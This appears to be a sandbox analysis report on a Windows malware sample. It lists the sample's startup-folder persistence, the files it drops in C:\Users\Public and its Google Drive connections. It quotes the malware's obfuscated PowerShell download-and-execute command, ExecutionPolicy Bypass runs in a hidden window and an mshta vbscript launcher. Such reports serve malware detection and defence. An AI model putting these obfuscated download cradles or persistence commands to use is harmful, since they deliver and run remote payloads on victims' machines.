Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- %ALLUSERSPROFILE%\microsoft arts\start\love.lnk
Modifies file system
Creates the following files
- C:\users\public\love.bat
- C:\users\public\love.lnk
- C:\users\public\msynci.ps1
Network activity
Connects to
- 'drive.google.com':443
- 'do#########ocs.googleusercontent.com':443
TCP
Other
- 'drive.google.com':443
- 'do#########ocs.googleusercontent.com':443
UDP
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
Miscellaneous
Searches for the following windows
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nologo -ExecutionPolicy Bypass C:\Users\Public\msynci.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $NOTHING = '(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='bC%%#&/%nlo'.Replace('%%#&/%','lient).Dow'); $Dont='adString(''https://drive.google.com/uc?export=download&id=1-Lj1BEGtD4TE8...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nologo -ExecutionPolicy Bypass C:\Users\Public\msynci.ps1' (with hidden window)
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $NOTHING = '(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='bC%%#&/%nlo'.Replace('%%#&/%','lient).Dow'); $Dont='adString(''https://drive.google.com/uc?export=download&id=1-Lj1BEGtD4TE8...
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\love.bat" "
- '<SYSTEM32>\mshta.exe' vbscript:(CreateObject("WSCrIPt.ShEll")).Run("powershell.exe -nologo -ExecutionPolicy Bypass C:\Users\Public\msynci.ps1",0)(window.close)
